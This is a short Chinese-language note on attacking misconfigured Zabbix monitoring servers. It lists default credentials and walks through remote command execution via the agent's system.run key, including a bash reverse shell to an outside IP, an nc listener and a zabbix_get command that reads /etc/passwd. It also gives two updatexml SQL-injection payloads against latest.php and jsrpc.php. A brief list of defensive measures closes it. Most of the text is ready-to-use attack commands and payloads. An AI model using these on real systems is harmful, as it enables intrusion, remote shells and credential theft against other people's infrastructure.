1:Zabbix配置不當安全事件
①案例事件
sohu的zabbix,可導致內網滲透
京東某站shell直入jae內網物理機內核版本過低
2:Zabbix弱口令利用
①弱口令
運維人員在初次安裝zabbix時候,zabbix默認的口令為Admin:zabbix,以及存在guest密碼為空,沒有進行更改和禁止guest用戶,導致zabbix存在致命漏洞,容易遭受攻擊。
②Zabbix server可以遠程在agent的機器上執行任意命令
建立監控項
命令調用:bash -i >& /dev/tcp/45.xx.xxx.x1/6666 0>&1
命令調用:nc -lvp 6666
zabbix_get命令調用
system.run[command,<mode>]這個模塊是agent自帶的,獲取服務器shell,獲取root權限。
命令調用:zabbix_get -s 172.18.0.4 -k 'system.run[cat /etc/passwd]'
3:Zabbix 注入利用
①
通過guest用戶session的后16位替換連接的sid,即可通過user()調出當前的啟動用戶
Payload: latest.php?output=ajax&sid=055e1ffa36164a58&favobj=toggle&toggle_open_state=1&toggle_ids[]=updatexml(0,concat(0xa,user()),0)
②
直接訪問
jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0)
4:攻擊方式
①默認口令
②注入漏洞
③BurpSuite爆破口令
5:防護措施
①zabbix放置在內網,不要暴露外網
②修改默認的口令密碼
③禁止guest用戶
④禁止以root啟動
⑤401認證
⑥舊版本備份數據-升級zabbix版本